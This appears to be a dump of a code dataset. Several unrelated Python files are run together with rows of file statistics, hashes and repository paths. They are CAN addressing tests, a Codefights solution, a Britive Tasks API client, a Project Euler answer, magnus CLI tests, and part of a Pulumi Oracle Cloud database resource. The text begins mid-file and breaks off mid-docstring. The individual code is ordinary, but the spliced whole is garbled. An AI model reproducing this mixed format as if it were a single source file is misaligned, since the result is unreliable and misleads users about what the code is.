CanAddressingInformationHandler.SOURCE_ADDRESS_NAME: None,
CanAddressingInformationHandler.ADDRESS_EXTENSION_NAME: 0x0B,
}),
(CanAddressingFormat.MIXED_11BIT_ADDRESSING, 0x60A, [0xD9], {
CanAddressingInformationHandler.ADDRESSING_TYPE_NAME: None,
CanAddressingInformationHandler.TARGET_ADDRESS_NAME: None,
CanAddressingInformationHandler.SOURCE_ADDRESS_NAME: None,
CanAddressingInformationHandler.ADDRESS_EXTENSION_NAME: 0xD9,
}),
# Mixed 29bit
(CanAddressingFormat.MIXED_29BIT_ADDRESSING, 0x18CEE009, [0x9A], {
CanAddressingInformationHandler.ADDRESSING_TYPE_NAME: AddressingType.PHYSICAL,
CanAddressingInformationHandler.TARGET_ADDRESS_NAME: 0xE0,
CanAddressingInformationHandler.SOURCE_ADDRESS_NAME: 0x09,
CanAddressingInformationHandler.ADDRESS_EXTENSION_NAME: 0x9A,
}),
(CanAddressingFormat.MIXED_29BIT_ADDRESSING, 0x18CDE009, [0x9A], {
CanAddressingInformationHandler.ADDRESSING_TYPE_NAME: AddressingType.FUNCTIONAL,
CanAddressingInformationHandler.TARGET_ADDRESS_NAME: 0xE0,
CanAddressingInformationHandler.SOURCE_ADDRESS_NAME: 0x09,
CanAddressingInformationHandler.ADDRESS_EXTENSION_NAME: 0x9A,
}),
])
def test_decode_ai(self, addressing_format, can_id, ai_data_bytes, expected_output):
assert CanAddressingInformationHandler.decode_ai(addressing_format=addressing_format,
can_id=can_id,
ai_data_bytes=ai_data_bytes) == expected_output
# encode_ai_data_bytes
@pytest.mark.parametrize("addressing_format, target_address, address_extension", [
(CanAddressingFormat.NORMAL_11BIT_ADDRESSING, None, None),
(CanAddressingFormat.NORMAL_FIXED_ADDRESSING, 0xFF, None),
(CanAddressingFormat.EXTENDED_ADDRESSING, 0x8C, None),
(CanAddressingFormat.MIXED_11BIT_ADDRESSING, None, 0x08),
(CanAddressingFormat.MIXED_29BIT_ADDRESSING, 0x2F, 0xEA),
])
def test_generate_ai_data_bytes(self, addressing_format, target_address, address_extension):
ai_data_bytes = CanAddressingInformationHandler.encode_ai_data_bytes(addressing_format=addressing_format,
target_address=target_address,
address_extension=address_extension)
assert len(ai_data_bytes) == CanAddressingInformationHandler.get_ai_data_bytes_number(addressing_format)
# validate_ai
@pytest.mark.parametrize("kwargs", [
# Normal 11 bit
{"addressing_format": CanAddressingFormat.NORMAL_11BIT_ADDRESSING,
"addressing_type": AddressingType.PHYSICAL,
"can_id": 0x620},
{"addressing_format": CanAddressingFormat.NORMAL_11BIT_ADDRESSING,
"addressing_type": AddressingType.FUNCTIONAL,
"can_id": 0x7FF},
# Normal Fixed
{"addressing_format": CanAddressingFormat.NORMAL_FIXED_ADDRESSING,
"addressing_type": AddressingType.PHYSICAL,
"can_id": 0x18DA1234},
{"addressing_format": CanAddressingFormat.NORMAL_FIXED_ADDRESSING,
"addressing_type": AddressingType.FUNCTIONAL,
"can_id": 0x18DBB0C2},
{"addressing_format": CanAddressingFormat.NORMAL_FIXED_ADDRESSING,
"addressing_type": AddressingType.PHYSICAL,
"target_address": 0xB0,
"source_address": 0xC2},
# Extended
{"addressing_format": CanAddressingFormat.EXTENDED_ADDRESSING,
"addressing_type": AddressingType.PHYSICAL,
"can_id": 0x645,
"target_address": 0xE3},
{"addressing_format": CanAddressingFormat.EXTENDED_ADDRESSING,
"addressing_type": AddressingType.FUNCTIONAL,
"can_id": 0x1A654321,
"target_address": 0xFF},
# Mixed 11bit
{"addressing_format": CanAddressingFormat.MIXED_11BIT_ADDRESSING,
"addressing_type": AddressingType.PHYSICAL,
"can_id": 0x7F3,
"address_extension": 0x0B},
{"addressing_format": CanAddressingFormat.MIXED_11BIT_ADDRESSING,
"addressing_type": AddressingType.FUNCTIONAL,
"can_id": 0x60A,
"address_extension": 0xD9},
# Mixed 29bit
{"addressing_format": CanAddressingFormat.MIXED_29BIT_ADDRESSING,
"addressing_type": AddressingType.PHYSICAL,
"can_id": 0x18CEE009,
"address_extension": 0x9A},
{"addressing_format": CanAddressingFormat.MIXED_29BIT_ADDRESSING,
"addressing_type": AddressingType.FUNCTIONAL,
"can_id": 0x18CDE009,
"address_extension": 0x9A},
{"addressing_format": CanAddressingFormat.MIXED_29BIT_ADDRESSING,
"addressing_type": AddressingType.PHYSICAL,
"can_id": 0x18CE918B,
"target_address": 0x91,
"source_address": 0x8B,
"address_extension": 0xD9},
{"addressing_format": CanAddressingFormat.MIXED_29BIT_ADDRESSING,
"addressing_type": AddressingType.PHYSICAL,
"target_address": 0x91,
"source_address": 0x8B,
"address_extension": 0xD9},
])
def test_validate_ai__valid(self, kwargs):
assert CanAddressingInformationHandler.validate_ai(**kwargs) is None
@pytest.mark.parametrize("kwargs", [
# Normal 11 bit
{"addressing_format": CanAddressingFormat.NORMAL_11BIT_ADDRESSING,
"addressing_type": AddressingType.PHYSICAL,
"can_id": 0x620,
"target_address": 0x9F},
{"addressing_format": CanAddressingFormat.NORMAL_11BIT_ADDRESSING,
"addressing_type": AddressingType.PHYSICAL,
"can_id": 0x620,
"source_address": 0x9F},
# Normal Fixed
{"addressing_format": CanAddressingFormat.NORMAL_FIXED_ADDRESSING,
"addressing_type": AddressingType.PHYSICAL,
"can_id": 0x18DB1234},
{"addressing_format": CanAddressingFormat.NORMAL_FIXED_ADDRESSING,
"addressing_type": AddressingType.FUNCTIONAL,
"can_id": 0x18DAB0C2},
{"addressing_format": CanAddressingFormat.NORMAL_FIXED_ADDRESSING,
"addressing_type": AddressingType.PHYSICAL,
"target_address": 0xB0},
{"addressing_format": CanAddressingFormat.NORMAL_FIXED_ADDRESSING,
"addressing_type": AddressingType.PHYSICAL,
"target_address": 0xB0,
"source_address": 0xC2,
"address_extension": 0xD9},
# Extended
{"addressing_format": CanAddressingFormat.EXTENDED_ADDRESSING,
"addressing_type": AddressingType.PHYSICAL,
"can_id": 0x645,
"address_extension": 0x01},
{"addressing_format": CanAddressingFormat.MIXED_11BIT_ADDRESSING,
"addressing_type": AddressingType.PHYSICAL,
"can_id": 0x7F3,
"target_address": 0x0B},
# Mixed 29bit
{"addressing_format": CanAddressingFormat.MIXED_29BIT_ADDRESSING,
"addressing_type": AddressingType.FUNCTIONAL,
"can_id": 0x18CEE009,
"address_extension": 0x9A},
{"addressing_format": CanAddressingFormat.MIXED_29BIT_ADDRESSING,
"addressing_type": AddressingType.PHYSICAL,
"can_id": 0x18CDE009,
"address_extension": 0x9A},
{"addressing_format": CanAddressingFormat.MIXED_29BIT_ADDRESSING,
"addressing_type": AddressingType.FUNCTIONAL,
"can_id": 0x18CDE009},
])
def test_validate_ai__invalid(self, kwargs):
with pytest.raises((ValueError, TypeError)):
CanAddressingInformationHandler.validate_ai(**kwargs)
| 62.996377 | 120 | 0.643124 | 4,938 | 52,161 | 6.322398 | 0.035034 | 0.040519 | 0.036291 | 0.039558 | 0.91624 | 0.882127 | 0.852594 | 0.838565 | 0.823799 | 0.793145 | 0 | 0.019076 | 0.284446 | 52,161 | 827 | 121 | 63.072551 | 0.817383 | 0.009547 | 0 | 0.707483 | 0 | 0 | 0.107302 | 0.028394 | 0 | 0 | 0.016889 | 0 | 0.117007 | 1 | 0.057143 | false | 0 | 0.004082 | 0 | 0.066667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e7d24efe58656051781e5d11f446d70fb4522e33 | 115 | py | Python | Codefights/arcade/python-arcade/level-2/15.Feedback-Review/Python/solution1.py | RevansChen/online-judge | ad1b07fee7bd3c49418becccda904e17505f3018 | [
"MIT"
] | 7 | 2017-09-20T16:40:39.000Z | 2021-08-31T18:15:08.000Z | Codefights/arcade/python-arcade/level-2/15.Feedback-Review/Python/solution1.py | RevansChen/online-judge | ad1b07fee7bd3c49418becccda904e17505f3018 | [
"MIT"
] | null | null | null | Codefights/arcade/python-arcade/level-2/15.Feedback-Review/Python/solution1.py | RevansChen/online-judge | ad1b07fee7bd3c49418becccda904e17505f3018 | [
"MIT"
] | null | null | null | # Python3
# 有限制修改區域
import textwrap
def feedbackReview(feedback, size):
return textwrap.wrap(feedback, size)
| 14.375 | 40 | 0.756522 | 13 | 115 | 6.692308 | 0.769231 | 0.275862 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010309 | 0.156522 | 115 | 7 | 41 | 16.428571 | 0.886598 | 0.130435 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
413ee030a8d17329119cf7d0b4182484cea57c06 | 6,393 | py | Python | src/britive/tasks.py | britive/python-api | 2daa7693f1d4adf03626abd78598e30f62b6e2e6 | [
"MIT"
] | null | null | null | src/britive/tasks.py | britive/python-api | 2daa7693f1d4adf03626abd78598e30f62b6e2e6 | [
"MIT"
] | null | null | null | src/britive/tasks.py | britive/python-api | 2daa7693f1d4adf03626abd78598e30f62b6e2e6 | [
"MIT"
] | null | null | null |
class Tasks:
def __init__(self, britive):
self.britive = britive
self.base_url = f'{self.britive.base_url}/tasks'
def list(self, task_service_id: str) -> list:
"""
Return a list of tasks for the given `task_service_id`.
Make a call to `britive.task_services.get()` to obtain the appropriate `task_service_id`.
:param task_service_id: The ID of the task service.
:return: List of tasks.
"""
return self.britive.get(f'{self.base_url}/services/{task_service_id}/tasks')
def get(self, task_service_id: str, task_id: str) -> dict:
"""
Return details of a task.
Make a call to `britive.task_services.get()` to obtain the appropriate `task_service_id`.
:param task_service_id: The ID of the task service.
:param task_id: The ID of the task.
:return: Details of the task.
"""
return self.britive.get(f'{self.base_url}/services/{task_service_id}/tasks/{task_id}')[0]
def create(self, task_service_id: str, name: str, properties: dict, frequency_type: str, start_time: str = None,
frequency_interval: str = None) -> dict:
"""
Create a new task.
Make a call to `britive.task_services.get()` to obtain the appropriate `task_service_id`.
:param task_service_id: The ID of the task service.
:param name: The name of the task.
:param properties: This parameter is dependent on the task service type. Currently only `environmentScanner` is
supported. Below are details about how to properly set this parameter for `environmentScanner`.
* appId: this is the appContainerId of the app to be scanned.
* scope: This is a list of scopes. Each scope can be of type EnvironmentGroup or Environment.
* orgScan: Boolean indicating whether an org scan must be done or not.
{
"appId": "app-id",
"scope": [
{
"type": "EnvironmentGroup"|"Environment",
"value": "ID"
}
],
"orgScan": true|false
}
:param frequency_type: Valid values are Daily, Weekly, Monthly, Hourly (start_time is implicitly the next hour).
:param start_time: The start time of the task in GMT. Only applies to Daily, Weekly, and Monthly
frequency types. Example: `12:00`.
:param frequency_interval: Only applies to Weekly, Monthly, and Hourly frequency types.
* Weekly: possible values are 1-7, which is Mon-Sun, respectively.
* Monthly: possible values are from 1-31.
* Hourly: possible values are 1-23.
:return: Details of the newly created task.
"""
data = {
'name': name,
'startTime': start_time,
'frequencyType': frequency_type,
'frequencyInterval': frequency_interval,
'properties': properties
}
return self.britive.post(f'{self.base_url}/services/{task_service_id}/tasks', json=data)
def statuses(self, task_service_id: str, task_id: str) -> list:
"""
Return a list of task statuses ordered by `sentTime` (part of the response) desc.
:param task_service_id: The ID of the task service.
:param task_id: The ID of the task.
:return: List of task statuses.
"""
return self.britive.get(f'{self.base_url}/services/{task_service_id}/tasks/{task_id}/statuses')
def update(self, task_service_id: str, task_id: str, name: str = None, properties: dict = None,
frequency_type: str = None, start_time: str = None, frequency_interval: str = None) -> dict:
"""
Updates a task.
Only provide parameters that should be updated.
Make a call to `britive.task_services.get()` to obtain the appropriate `task_service_id`.
:param task_service_id: The ID of the task service.
:param task_id: The ID of the task.
:param name: The name of the task.
:param properties: This parameter is dependent on the task service type. Currently only `environmentScanner` is
supported. Below are details about how to properly set this parameter for `environmentScanner`.
* appId: this is the appContainerId of the app to be scanned.
* scope: This is a list of scopes. Each scope can be of type EnvironmentGroup or Environment.
* orgScan: Boolean indicating whether an org scan must be done or not.
{
"appId": "app-id",
"scope": [
{
"type": "EnvironmentGroup"|"Environment",
"value": "ID"
}
],
"orgScan": true|false
}
:param frequency_type: Valid values are Daily, Weekly, Monthly, Hourly (start_time is implicitly the next hour).
:param start_time: The start time of the task in GMT. Only applies to Daily, Weekly, and Monthly
frequency types. Example: `12:00`.
:param frequency_interval: Only applies to Weekly, Monthly, and Hourly frequency types.
* Weekly: possible values are 1-7, which is Mon-Sun, respectively.
* Monthly: possible values are from 1-31.
* Hourly: possible values are 1-23.
:return: Details of the newly created task.
"""
# construct the dict assuming every parameter is present
raw_data = {
'name': name,
'startTime': start_time,
'frequencyType': frequency_type,
'frequencyInterval': frequency_interval,
'properties': properties
}
# and now remove any None values
data = {k: v for k, v in raw_data.items() if v is not None}
return self.britive.patch(f'{self.base_url}/services/{task_service_id}/tasks/{task_id}', json=data)
def delete(self, task_service_id: str, task_id: str) -> None:
"""
Delete a task.
:param task_service_id: The ID of the task service.
:param task_id: The ID of the task.
:return: None
"""
return self.britive.delete(f'{self.base_url}/services/{task_service_id}/tasks/{task_id}')
| 42.62 | 120 | 0.605037 | 814 | 6,393 | 4.633907 | 0.176904 | 0.090403 | 0.079268 | 0.02386 | 0.827147 | 0.817869 | 0.817869 | 0.807529 | 0.776776 | 0.743372 | 0 | 0.005628 | 0.305178 | 6,393 | 149 | 121 | 42.90604 | 0.843539 | 0.587361 | 0 | 0.30303 | 0 | 0 | 0.240816 | 0.186735 | 0 | 0 | 0 | 0 | 0 | 1 | 0.212121 | false | 0 | 0 | 0 | 0.424242 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
41659384dfa996af6dd233f199ef7fa839ef8583 | 1,338 | py | Python | p0008.py | bossm0n5t3r/project-euler-solutions | d07b6241a63d5fba2f83517c59fbe19cff66ad98 | [
"MIT"
] | null | null | null | p0008.py | bossm0n5t3r/project-euler-solutions | d07b6241a63d5fba2f83517c59fbe19cff66ad98 | [
"MIT"
] | null | null | null | p0008.py | bossm0n5t3r/project-euler-solutions | d07b6241a63d5fba2f83517c59fbe19cff66ad98 | [
"MIT"
] | null | null | null | # Solution to Project Euler Problem 8
NUMBER = "7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450"
ADJACENT = 13
def sol():
ans = max(digit_product(NUMBER[i : i + ADJACENT]) for i in range(len(NUMBER) - ADJACENT + 1))
return str(ans)
def digit_product(s):
result = 1
for c in s:
result *= int(c)
return result
if __name__ == "__main__":
print(sol())
| 74.333333 | 1,011 | 0.902093 | 51 | 1,338 | 23.470588 | 0.627451 | 0.02005 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.804 | 0.06577 | 1,338 | 17 | 1,012 | 78.705882 | 0.1536 | 0.026158 | 0 | 0 | 0 | 0 | 0.775385 | 0.769231 | 0 | 1 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0 | 0 | 0.333333 | 0.083333 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
41b9e32cd049f7f5b930789948e7bc65a3b5eaad | 4,994 | py | Python | tests/magnus/test_cli.py | project-magnus/magnus-core | 2e012803fadc8552a7e0b974a30d72ebcd1acdfa | [
"Apache-2.0"
] | 17 | 2022-01-25T09:04:25.000Z | 2022-02-08T21:02:16.000Z | tests/magnus/test_cli.py | project-magnus/magnus-core | 2e012803fadc8552a7e0b974a30d72ebcd1acdfa | [
"Apache-2.0"
] | null | null | null | tests/magnus/test_cli.py | project-magnus/magnus-core | 2e012803fadc8552a7e0b974a30d72ebcd1acdfa | [
"Apache-2.0"
] | null | null | null | import pytest
from magnus import cli
def test_init_prints_help_if_command_is_not_recognised(mocker, monkeypatch):
mock_argparse = mocker.MagicMock()
monkeypatch.setattr(cli, 'argparse', mock_argparse)
monkeypatch.setattr(cli.sys, 'argv', ['magnus', 'command_to_run'])
mock_parser = mocker.MagicMock()
mock_argparse.ArgumentParser.return_value = mock_parser
mock_command = mocker.MagicMock()
mock_parser.parse_args.return_value = mock_command
mock_command.command = 'command_to_run'
mock_help = mocker.MagicMock()
mock_parser.print_help = mock_help
with pytest.raises(SystemExit):
cli.MagnusCLI()
assert mock_help.call_count == 1
def test_init_calls_the_method_if_command_recognised(mocker, monkeypatch):
mock_argparse = mocker.MagicMock()
monkeypatch.setattr(cli, 'argparse', mock_argparse)
monkeypatch.setattr(cli.sys, 'argv', ['magnus', 'command_to_run'])
mock_parser = mocker.MagicMock()
mock_argparse.ArgumentParser.return_value = mock_parser
mock_command = mocker.MagicMock()
mock_parser.parse_args.return_value = mock_command
mock_command.command = 'dummy_function'
mock_function = mocker.MagicMock()
cli.MagnusCLI.dummy_function = mock_function
cli.MagnusCLI()
assert mock_function.call_count == 1
def test_execute_calls_pipeline_execute_with_right_variables(monkeypatch, mocker):
mock_argparse = mocker.MagicMock()
monkeypatch.setattr(cli, 'argparse', mock_argparse)
mock_resolve_args = mocker.MagicMock()
monkeypatch.setattr(cli.MagnusCLI, '_resolve_args', mock_resolve_args)
monkeypatch.setattr(cli.MagnusCLI, '__init__', mocker.MagicMock(return_value=None))
mock_pipeline_execute = mocker.MagicMock()
monkeypatch.setattr(cli.pipeline, 'execute', mock_pipeline_execute)
mock_args = mocker.MagicMock()
mock_args.use_cached = False
mock_args.run_id = 'some_run_id'
mock_args.var_file = 'variables_file'
mock_args.file = 'pipeline_file'
mock_args.tag = 'tag'
mock_args.config_file = 'configuration_file'
mock_args.log_level = 0
mock_resolve_args.return_value = mock_args, {'a': 1}
magnus_cli = cli.MagnusCLI()
magnus_cli.execute()
mock_pipeline_execute.assert_called_once_with(
variables_file='variables_file', pipeline_file='pipeline_file',
tag='tag', run_id='some_run_id', configuration_file='configuration_file',
use_cached=False, a=1)
def test_execute_calls_pipeline_execute_single_node_with_right_variables(monkeypatch, mocker):
mock_argparse = mocker.MagicMock()
monkeypatch.setattr(cli, 'argparse', mock_argparse)
mock_resolve_args = mocker.MagicMock()
monkeypatch.setattr(cli.MagnusCLI, '_resolve_args', mock_resolve_args)
monkeypatch.setattr(cli.MagnusCLI, '__init__', mocker.MagicMock(return_value=None))
mock_pipeline_execute = mocker.MagicMock()
monkeypatch.setattr(cli.pipeline, 'execute_single_node', mock_pipeline_execute)
mock_args = mocker.MagicMock()
mock_args.step_name = 'step_name'
mock_args.run_id = 'some_run_id'
mock_args.var_file = 'variables_file'
mock_args.file = 'pipeline_file'
mock_args.tag = 'tag'
mock_args.map_variable = {}
mock_args.config_file = 'configuration_file'
mock_args.log_level = 0
mock_resolve_args.return_value = mock_args, {'a': 1}
magnus_cli = cli.MagnusCLI()
magnus_cli.execute_single_node()
mock_pipeline_execute.assert_called_once_with(
variables_file='variables_file', pipeline_file='pipeline_file',
step_name='step_name', map_variable={}, configuration_file='configuration_file',
tag='tag', run_id='some_run_id',
a=1)
def test_execute_calls_pipeline_execute_single_branch_with_right_variables(monkeypatch, mocker):
mock_argparse = mocker.MagicMock()
monkeypatch.setattr(cli, 'argparse', mock_argparse)
mock_resolve_args = mocker.MagicMock()
monkeypatch.setattr(cli.MagnusCLI, '_resolve_args', mock_resolve_args)
monkeypatch.setattr(cli.MagnusCLI, '__init__', mocker.MagicMock(return_value=None))
mock_pipeline_execute = mocker.MagicMock()
monkeypatch.setattr(cli.pipeline, 'execute_single_brach', mock_pipeline_execute)
mock_args = mocker.MagicMock()
mock_args.branch_name = 'branch_name'
mock_args.run_id = 'some_run_id'
mock_args.var_file = 'variables_file'
mock_args.file = 'pipeline_file'
mock_args.tag = 'tag'
mock_args.map_variable = {}
mock_args.config_file = 'configuration_file'
mock_args.log_level = 0
mock_resolve_args.return_value = mock_args, {'a': 1}
magnus_cli = cli.MagnusCLI()
magnus_cli.execute_single_branch()
mock_pipeline_execute.assert_called_once_with(
variables_file='variables_file', pipeline_file='pipeline_file',
branch_name='branch_name', map_variable={}, configuration_file='configuration_file',
tag='tag', run_id='some_run_id',
a=1)
| 34.205479 | 96 | 0.745895 | 633 | 4,994 | 5.461295 | 0.118483 | 0.06711 | 0.097194 | 0.105004 | 0.868962 | 0.861441 | 0.859126 | 0.849002 | 0.843217 | 0.776106 | 0 | 0.002598 | 0.152183 | 4,994 | 145 | 97 | 34.441379 | 0.813888 | 0 | 0 | 0.715686 | 0 | 0 | 0.124549 | 0 | 0 | 0 | 0 | 0 | 0.04902 | 1 | 0.04902 | false | 0 | 0.019608 | 0 | 0.068627 | 0.019608 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
41bd46cba06b5ae8841e838aeb81d98d43f896a0 | 214,427 | py | Python | sdk/python/pulumi_oci/database/autonomous_database.py | EladGabay/pulumi-oci | 6841e27d4a1a7e15c672306b769912efbfd3ba99 | [
"ECL-2.0",
"Apache-2.0"
] | 5 | 2021-08-17T11:14:46.000Z | 2021-12-31T02:07:03.000Z | sdk/python/pulumi_oci/database/autonomous_database.py | pulumi-oci/pulumi-oci | 6841e27d4a1a7e15c672306b769912efbfd3ba99 | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2021-09-06T11:21:29.000Z | 2021-09-06T11:21:29.000Z | sdk/python/pulumi_oci/database/autonomous_database.py | pulumi-oci/pulumi-oci | 6841e27d4a1a7e15c672306b769912efbfd3ba99 | [
"ECL-2.0",
"Apache-2.0"
] | 2 | 2021-08-24T23:31:30.000Z | 2022-01-02T19:26:54.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['AutonomousDatabaseArgs', 'AutonomousDatabase']
@pulumi.input_type
class AutonomousDatabaseArgs:
def __init__(__self__, *,
compartment_id: pulumi.Input[str],
db_name: pulumi.Input[str],
admin_password: Optional[pulumi.Input[str]] = None,
are_primary_whitelisted_ips_used: Optional[pulumi.Input[bool]] = None,
autonomous_container_database_id: Optional[pulumi.Input[str]] = None,
autonomous_database_backup_id: Optional[pulumi.Input[str]] = None,
autonomous_database_id: Optional[pulumi.Input[str]] = None,
autonomous_maintenance_schedule_type: Optional[pulumi.Input[str]] = None,
clone_type: Optional[pulumi.Input[str]] = None,
cpu_core_count: Optional[pulumi.Input[int]] = None,
customer_contacts: Optional[pulumi.Input[Sequence[pulumi.Input['AutonomousDatabaseCustomerContactArgs']]]] = None,
data_safe_status: Optional[pulumi.Input[str]] = None,
data_storage_size_in_gb: Optional[pulumi.Input[int]] = None,
data_storage_size_in_tbs: Optional[pulumi.Input[int]] = None,
db_version: Optional[pulumi.Input[str]] = None,
db_workload: Optional[pulumi.Input[str]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
display_name: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
is_access_control_enabled: Optional[pulumi.Input[bool]] = None,
is_auto_scaling_enabled: Optional[pulumi.Input[bool]] = None,
is_data_guard_enabled: Optional[pulumi.Input[bool]] = None,
is_dedicated: Optional[pulumi.Input[bool]] = None,
is_free_tier: Optional[pulumi.Input[bool]] = None,
is_preview_version_with_service_terms_accepted: Optional[pulumi.Input[bool]] = None,
is_refreshable_clone: Optional[pulumi.Input[bool]] = None,
kms_key_id: Optional[pulumi.Input[str]] = None,
license_model: Optional[pulumi.Input[str]] = None,
nsg_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
ocpu_count: Optional[pulumi.Input[float]] = None,
open_mode: Optional[pulumi.Input[str]] = None,
operations_insights_status: Optional[pulumi.Input[str]] = None,
permission_level: Optional[pulumi.Input[str]] = None,
private_endpoint_label: Optional[pulumi.Input[str]] = None,
refreshable_mode: Optional[pulumi.Input[str]] = None,
rotate_key_trigger: Optional[pulumi.Input[bool]] = None,
source: Optional[pulumi.Input[str]] = None,
source_id: Optional[pulumi.Input[str]] = None,
standby_whitelisted_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
state: Optional[pulumi.Input[str]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
switchover_to: Optional[pulumi.Input[str]] = None,
timestamp: Optional[pulumi.Input[str]] = None,
vault_id: Optional[pulumi.Input[str]] = None,
whitelisted_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a AutonomousDatabase resource.
:param pulumi.Input[str] compartment_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment of the Autonomous Database.
:param pulumi.Input[str] db_name: The database name. The name must begin with an alphabetic character and can contain a maximum of 14 alphanumeric characters. Special characters are not permitted. The database name must be unique in the tenancy.
:param pulumi.Input[str] admin_password: (Updatable) The password must be between 12 and 30 characters long, and must contain at least 1 uppercase, 1 lowercase, and 1 numeric character. It cannot contain the double quote symbol (") or the username "admin", regardless of casing. The password is mandatory if source value is "BACKUP_FROM_ID", "BACKUP_FROM_TIMESTAMP", "DATABASE" or "NONE".
:param pulumi.Input[bool] are_primary_whitelisted_ips_used: (Updatable) This field will be null if the Autonomous Database is not Data Guard enabled or Access Control is disabled. It's value would be `TRUE` if Autonomous Database is Data Guard enabled and Access Control is enabled and if the Autonomous Database uses primary IP access control list (ACL) for standby. It's value would be `FALSE` if Autonomous Database is Data Guard enabled and Access Control is enabled and if the Autonomous Database uses different IP access control list (ACL) for standby compared to primary.
:param pulumi.Input[str] autonomous_container_database_id: The Autonomous Container Database [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm).
:param pulumi.Input[str] autonomous_database_backup_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the source Autonomous Database Backup that you will clone to create a new Autonomous Database.
:param pulumi.Input[str] autonomous_database_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the source Autonomous Database that you will clone to create a new Autonomous Database.
:param pulumi.Input[str] autonomous_maintenance_schedule_type: The maintenance schedule type of the Autonomous Database on shared Exadata infrastructure. The EARLY maintenance schedule of this Autonomous Database follows a schedule that applies patches prior to the REGULAR schedule.The REGULAR maintenance schedule of this Autonomous Database follows the normal cycle.
:param pulumi.Input[str] clone_type: The Autonomous Database clone type.
:param pulumi.Input[int] cpu_core_count: (Updatable) The number of OCPU cores to be made available to the database. For Autonomous Databases on dedicated Exadata infrastructure, the maximum number of cores is determined by the infrastructure shape. See [Characteristics of Infrastructure Shapes](https://www.oracle.com/pls/topic/lookup?ctx=en/cloud/paas/autonomous-database&id=ATPFG-GUID-B0F033C1-CC5A-42F0-B2E7-3CECFEDA1FD1) for shape details.
:param pulumi.Input[Sequence[pulumi.Input['AutonomousDatabaseCustomerContactArgs']]] customer_contacts: (Updatable) Customer Contacts.
:param pulumi.Input[str] data_safe_status: (Updatable) Status of the Data Safe registration for this Autonomous Database. Could be REGISTERED or NOT_REGISTERED.
:param pulumi.Input[int] data_storage_size_in_gb: (Updatable) The size, in gigabytes, of the data volume that will be created and attached to the database. This storage can later be scaled up if needed. The maximum storage value is determined by the infrastructure shape. See [Characteristics of Infrastructure Shapes](https://www.oracle.com/pls/topic/lookup?ctx=en/cloud/paas/autonomous-database&id=ATPFG-GUID-B0F033C1-CC5A-42F0-B2E7-3CECFEDA1FD1) for shape details.
:param pulumi.Input[int] data_storage_size_in_tbs: (Updatable) The size, in terabytes, of the data volume that will be created and attached to the database. This storage can later be scaled up if needed. For Autonomous Databases on dedicated Exadata infrastructure, the maximum storage value is determined by the infrastructure shape. See [Characteristics of Infrastructure Shapes](https://www.oracle.com/pls/topic/lookup?ctx=en/cloud/paas/autonomous-database&id=ATPFG-GUID-B0F033C1-CC5A-42F0-B2E7-3CECFEDA1FD1) for shape details.
